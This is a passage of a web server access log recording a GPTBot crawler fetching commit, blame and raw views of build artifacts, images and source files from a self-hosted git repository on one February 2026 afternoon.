(KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" +[17/Feb/2026:14:57:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" [Client 74.7.227.38] [Length 10412] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" +[17/Feb/2026:14:57:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" [Client 74.7.227.38] [Length 10379] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" +[17/Feb/2026:14:57:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" [Client 74.7.227.38] [Length 16629] [Gzip 8.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" +[17/Feb/2026:14:57:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" [Client 74.7.227.38] [Length 9955] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" +[17/Feb/2026:14:57:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" [Client 74.7.227.38] [Length 10208] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" +[17/Feb/2026:14:57:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" [Client 74.7.227.38] [Length 10206] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" +[17/Feb/2026:14:57:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" [Client 74.7.227.38] [Length 4648] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" +[17/Feb/2026:14:57:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" [Client 74.7.227.38] [Length 4648] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" +[17/Feb/2026:14:57:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" [Client 74.7.227.38] [Length 9957] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" +[17/Feb/2026:14:57:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" [Client 74.7.227.38] [Length 3599826] [Gzip 11.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" +[17/Feb/2026:14:57:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" [Client 74.7.227.38] [Length 16600] [Gzip 8.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" +[17/Feb/2026:14:57:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" [Client 74.7.227.38] [Length 14290] [Gzip 8.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" +[17/Feb/2026:14:57:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" [Client 74.7.227.38] [Length 14291] [Gzip 8.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" +[17/Feb/2026:14:57:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" [Client 74.7.227.38] [Length 1154321] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" +[17/Feb/2026:14:57:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" [Client 74.7.227.38] [Length 1154321] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" +[17/Feb/2026:14:57:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" [Client 74.7.227.38] [Length 6417] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" +[17/Feb/2026:14:57:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" [Client 74.7.227.38] [Length 6417] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" +[17/Feb/2026:14:57:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" [Client 74.7.227.38] [Length 3599823] [Gzip 11.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" +[17/Feb/2026:14:57:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=.Backup%2fhtml%2fcomponents%2fHero.tsx" [Client 74.7.227.38] [Length 25830] [Gzip 4.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/Hero.tsx" +[17/Feb/2026:14:57:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/pip" [Client 74.7.227.38] [Length 11547] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin" +[17/Feb/2026:14:57:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/pip" [Client 74.7.227.38] [Length 11512] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin" +[17/Feb/2026:14:57:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=asset_pilot_docker%2fapp%2fmodels.py" [Client 74.7.227.38] [Length 26357] [Gzip 4.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app/models.py" +[17/Feb/2026:14:57:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=asset_pilot_docker%2fstart.sh" [Client 74.7.227.38] [Length 28375] [Gzip 5.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/start.sh" +[17/Feb/2026:14:57:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=asset_pilot_docker%2fstatic%2fjs" [Client 74.7.227.38] [Length 37488] [Gzip 7.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/static/js" +[17/Feb/2026:14:57:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=asset_pilot_docker%2f.gitignore" [Client 74.7.227.38] [Length 25269] [Gzip 4.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.gitignore" +[17/Feb/2026:14:57:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" [Client 74.7.227.38] [Length 322379] [Gzip 27.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" +[17/Feb/2026:14:57:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=npm%2fdata%2flogs%2fletsencrypt-requests_access.log" [Client 74.7.227.38] [Length 22935] [Gzip 3.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt-requests_access.log" +[17/Feb/2026:14:57:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=.Backup%2fhtml%2fassets%2fimages%2fControlRoom4.png" [Client 74.7.227.38] [Length 22744] [Gzip 3.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom4.png" +[17/Feb/2026:14:57:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=.Backup%2fhtml%2fassets%2fimages%2fControlRoom6.png" [Client 74.7.227.38] [Length 22773] [Gzip 3.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom6.png" +[17/Feb/2026:14:57:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=.Backup%2fhtml%2fassets%2fimages%2fControlRoom2.png" [Client 74.7.227.38] [Length 22729] [Gzip 3.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom2.png" +[17/Feb/2026:14:57:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/pip" [Client 74.7.227.38] [Length 265] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/pip" +[17/Feb/2026:14:57:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/pip" [Client 74.7.227.38] [Length 265] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/pip" +[17/Feb/2026:14:57:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=.Backup%2fhtml%2fassets%2fimages%2fControlRoom3.png" [Client 74.7.227.38] [Length 22735] [Gzip 3.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom3.png" +[17/Feb/2026:14:57:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=.Backup%2fhtml%2fassets%2fimages%2fControlRoom1.png" [Client 74.7.227.38] [Length 22743] [Gzip 3.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom1.png" +[17/Feb/2026:14:57:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=.Backup%2fhtml%2fassets%2fimages%2fControlRoom5.png" [Client 74.7.227.38] [Length 22755] [Gzip 3.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom5.png" +[17/Feb/2026:14:57:36 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_upload/main/" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot" +[17/Feb/2026:14:57:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_upload/main/" +[17/Feb/2026:14:57:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?show-outdated=&style=split&whitespace=show-all" [Client 74.7.227.38] [Length 458007] [Gzip 15.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec" +[17/Feb/2026:14:57:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" [Client 74.7.227.38] [Length 9932] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" +[17/Feb/2026:14:57:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6?show-outdated=&style=split&whitespace=show-all" [Client 74.7.227.38] [Length 84841] [Gzip 12.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6" +[17/Feb/2026:14:57:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=asset_pilot_docker%2fapp" [Client 74.7.227.38] [Length 45875] [Gzip 7.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app" +[17/Feb/2026:14:57:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.gitignore?display=source" [Client 74.7.227.38] [Length 11121] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.gitignore" +[17/Feb/2026:14:57:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/index.tsx?display=rendered" [Client 74.7.227.38] [Length 10873] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/index.tsx" +[17/Feb/2026:14:57:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 10932] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build" +[17/Feb/2026:14:57:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 9931] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeCache.txt" +[17/Feb/2026:14:57:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/base_library.zip" [Client 74.7.227.38] [Length 9919] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/base_library.zip" +[17/Feb/2026:14:57:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 9907] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeCache.txt" +[17/Feb/2026:14:57:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/PYZ-00.pyz" [Client 74.7.227.38] [Length 9911] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/PYZ-00.pyz" +[17/Feb/2026:14:57:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/PYZ-00.pyz" [Client 74.7.227.38] [Length 14229638] [Gzip 11.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/PYZ-00.pyz" +[17/Feb/2026:14:57:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/localpycs" [Client 74.7.227.38] [Length 10332] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 